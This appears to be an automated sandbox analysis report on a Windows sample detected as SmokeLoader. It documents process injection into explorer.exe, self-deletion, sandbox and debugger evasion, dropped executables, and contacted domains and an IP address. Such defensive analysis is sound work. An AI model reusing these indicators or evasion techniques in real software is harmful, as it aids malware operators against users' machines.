                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_00401F3A pushad ; ret 9_2_00401FAF
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_004019C7 push esp; retf 9_2_004019C8
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_00402DCB push FFFFFF9Bh; retf 9_2_00402DD5
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_006D1A2E push esp; retf 9_2_006D1A2F
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_006D1EE4 pushad ; ret 9_2_006D2016
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_006D1FC9 pushad ; ret 9_2_006D2016
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_006D1FAE pushad ; ret 9_2_006D2016
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_006D1FA1 pushad ; ret 9_2_006D2016
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_006D1F96 pushad ; ret 9_2_006D2016
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_006FDD39 push esp; retf 9_2_006FDD3A
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_00422F40 push ecx; mov dword ptr [esp], ecx10_2_00422F44
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_025CB597 pushad ; iretd 10_2_025CB598
                Source: Serpodtudpwhhta.dll.10.drStatic PE information: section name: .didata
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\dfhwravJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\5AF.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeFile created: C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dllJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\ADCA.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\dfhwravJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Deletes itself after installation
                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\dfhwrav:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_0085E760 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_0085E760
                Source: C:\Users\user\AppData\Local\Temp\5AF.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000004426EB0 second address: 000000000442778E instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-0Ch], edx 0x00000005 mov dword ptr [ebp-24h], 0000000Dh 0x0000000c mov eax, 00000001h 0x00000011 cmp eax, 00000000h 0x00000014 jnbe 00007F9AF0396623h 0x00000016 mov eax, dword ptr [ebp-0Ch] 0x00000019 sub eax, dword ptr [ebp-04h] 0x0000001c cmp eax, dword ptr [ebp-24h] 0x0000001f jnl 00007F9AF039662Ah 0x00000021 inc dword ptr [ebp-14h] 0x00000024 jmp 00007F9AF0396C90h 0x00000029 mov eax, 00000000h 0x0000002e cmp eax, 00000000h 0x00000031 je 00007F9AF0396623h 0x00000033 cmp dword ptr [ebp-14h], 02h 0x00000037 jng 00007F9AF039685Ah 0x0000003d rdtsc
                Checks if the current machine is a virtual machine (disk enumeration)
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\dfhwravKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\dfhwravKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\dfhwravKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\dfhwravKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\dfhwravKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\dfhwravKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Windows\explorer.exe TID: 644Thread sleep count: 652 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5544Thread sleep count: 1177 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5544Thread sleep time: -117700s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 1104Thread sleep count: 1303 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1104Thread sleep time: -130300s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 1320Thread sleep count: 487 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1276Thread sleep count: 1102 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1276Thread sleep time: -110200s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 1332Thread sleep count: 1135 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1332Thread sleep time: -113500s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\5AF.exe TID: 2588Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_10-21262
                Source: C:\Users\user\AppData\Local\Temp\5AF.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 652Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1177Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1303Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 487Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1102Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1135Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\5AF.exeFile opened: PHYSICALDRIVE0Jump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_0040D450 FindFirstFileW,FindClose,10_2_0040D450
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_004235B0 FindFirstFileW,FindClose,10_2_004235B0
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_0040CE84 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,10_2_0040CE84
                Source: C:\Users\user\AppData\Local\Temp\5AF.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: WerFault.exe, 00000013.00000002.551745803.0000000004738000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh$
                Source: explorer.exe, 00000001.00000000.294130406.00000000045B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000001.00000000.336477540.00000000081DD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000^
                Source: explorer.exe, 00000001.00000000.298060433.0000000006710000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                Source: WerFault.exe, 00000013.00000003.544336242.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000002.555779726.0000000004B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: explorer.exe, 00000001.00000000.303121165.0000000008304000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                Source: 5AF.exe, 00000016.00000002.541764212.0000000002B75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: K,<=;;?9:VMcI;8
                Source: explorer.exe, 00000001.00000000.268546487.00000000082B2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                Source: explorer.exe, 00000001.00000000.268287568.0000000008200000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>&

                Anti Debugging

                barindex
                Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\dfhwravSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0207092B mov eax, dword ptr fs:[00000030h]0_2_0207092B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02070D90 mov eax, dword ptr fs:[00000030h]0_2_02070D90
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_006D092B mov eax, dword ptr fs:[00000030h]9_2_006D092B
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_006D0D90 mov eax, dword ptr fs:[00000030h]9_2_006D0D90
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_006FC2CB push dword ptr fs:[00000030h]9_2_006FC2CB
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_025CA0A3 push dword ptr fs:[00000030h]10_2_025CA0A3
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\dfhwravProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688Jump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402709 LdrLoadDll,0_2_00402709

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Benign windows process drops PE files
                Source: C:\Windows\explorer.exeFile created: dfhwrav.1.drJump to dropped file
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeDomain query: thepokeway.nl
                Source: C:\Windows\explorer.exeNetwork Connect: 123.253.32.170 80Jump to behavior
                Source: C:\Windows\explorer.exeDomain query: dowe.at
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Roaming\dfhwravSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\dfhwravSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Creates a thread in another existing process (thread injection)
                Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 4E619E0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\dfhwravThread created: unknown EIP: 4FD19E0Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_0087C50C InitializeSecurityDescriptor,InitializeAcl,CreateWellKnownSid,CreateWellKnownSid,AddAccessAllowedAce,SetSecurityDescriptorDacl,10_2_0087C50C
                Source: explorer.exe, 00000001.00000000.322936915.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.258688322.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.292482159.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: XProgram Manager
                Source: explorer.exe, 00000001.00000000.298015850.0000000005D90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.322936915.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.268820967.000000000833A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000001.00000000.322936915.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.258688322.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.291794851.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000001.00000000.322936915.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.258688322.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.292482159.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,10_2_0040D588
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,10_2_0040CA28
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: ADCA.exe, 0000000A.00000003.437793710.000000007F700000.00000004.00001000.00020000.00000000.sdmp, ADCA.exe, 0000000A.00000003.450202572.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000000.455797744.0000000004041000.00000020.00000001.01000000.00000009.sdmpBinary or memory string: MSASCui.exe

                Stealing of Sensitive Information

                barindex
                Yara detected SmokeLoader
                Source: Yara matchFile source: 0.2.file.exe.2070e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.3.dfhwrav.2080000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.dfhwrav.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.dfhwrav.6d0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.2080000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.373157026.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.247155743.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Yara detected SmokeLoader
                Source: Yara matchFile source: 0.2.file.exe.2070e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.3.dfhwrav.2080000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.dfhwrav.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.dfhwrav.6d0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.2080000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.373157026.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.247155743.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts11
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Disable or Modify Tools                		1
                Input Capture                		1
                File and Directory Discovery                		Remote Services1
                Archive Collected Data                		Exfiltration Over Other Network Medium11
                Ingress Tool Transfer                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                Exploitation for Client Execution                		Boot or Logon Initialization Scripts312
                Process Injection                		1
                Deobfuscate/Decode Files or Information                		LSASS Memory123
                System Information Discovery                		Remote Desktop Protocol1
                Input Capture                		Exfiltration Over Bluetooth21
                Encrypted Channel                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts2
                Command and Scripting Interpreter                		Logon Script (Windows)Logon Script (Windows)2
                Obfuscated Files or Information                		Security Account Manager1
                Query Registry                		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                Non-Application Layer Protocol                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)22
                Software Packing                		NTDS331
                Security Software Discovery                		Distributed Component Object ModelInput CaptureScheduled Transfer124
                Application Layer Protocol                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets141
                Virtualization/Sandbox Evasion                		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                File Deletion                		Cached Domain Credentials3
                Process Discovery                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items11
                Masquerading                		DCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job141
                Virtualization/Sandbox Evasion                		Proc Filesystem1
                Remote System Discovery                		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)312
                Process Injection                		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                Hidden Files and Directories                		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                Rundll32                		Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 756294 Sample: file.exe Startdate: 30/11/2022 Architecture: WINDOWS Score: 100 50 Malicious sample detected (through community Yara rule) 2->50 52 Antivirus detection for URL or domain 2->52 54 Multi AV Scanner detection for submitted file 2->54 56 4 other signatures 2->56 9 file.exe 2->9         started        12 dfhwrav 2->12         started        14 5AF.exe 2->14         started        process3 signatures4 72 Detected unpacking (changes PE section rights) 9->72 74 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 9->74 76 Maps a DLL or memory area into another process 9->76 16 explorer.exe 6 9->16 injected 78 Machine Learning detection for dropped file 12->78 80 Checks if the current machine is a virtual machine (disk enumeration) 12->80 82 Creates a thread in another existing process (thread injection) 12->82 process5 dnsIp6 44 123.253.32.170, 49725, 80 TFN-TWTaiwanFixedNetworkTelcoandNetworkServiceProvi Malaysia 16->44 46 thepokeway.nl 5.135.247.111, 443, 49739 OVHFR France 16->46 48 5 other IPs or domains 16->48 34 C:\Users\user\AppData\Roaming\dfhwrav, PE32 16->34 dropped 36 C:\Users\user\AppData\Local\Temp\ADCA.exe, PE32 16->36 dropped 38 C:\Users\user\AppData\Local\Temp\5AF.exe, PE32 16->38 dropped 40 C:\Users\user\...\dfhwrav:Zone.Identifier, ASCII 16->40 dropped 58 System process connects to network (likely due to code injection or exploit) 16->58 60 Benign windows process drops PE files 16->60 62 Deletes itself after installation 16->62 64 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->64 21 ADCA.exe 1 16->21         started        25 5AF.exe 16->25         started        file7 signatures8 process9 file10 42 C:\Users\user\AppData\...\Serpodtudpwhhta.dll, PE32 21->42 dropped 66 Detected unpacking (changes PE section rights) 21->66 68 Detected unpacking (overwrites its own PE header) 21->68 70 Machine Learning detection for dropped file 21->70 27 rundll32.exe 21->27         started        signatures11 process12 signatures13 84 Tries to detect virtualization through RDTSC time measurements 27->84 30 WerFault.exe 3 10 27->30         started        32 WerFault.exe 27->32         started        process14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe34%VirustotalBrowse
                file.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\dfhwrav100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\ADCA.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\5AF.exe100%Joe Sandbox ML

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                0.3.file.exe.2080000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                9.2.dfhwrav.6d0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                22.2.5AF.exe.23be12c.2.unpack100%AviraTR/Patched.Ren.Gen7Download File
                0.2.file.exe.2070e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.2.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                9.2.dfhwrav.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                9.3.dfhwrav.2080000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                16.2.5AF.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
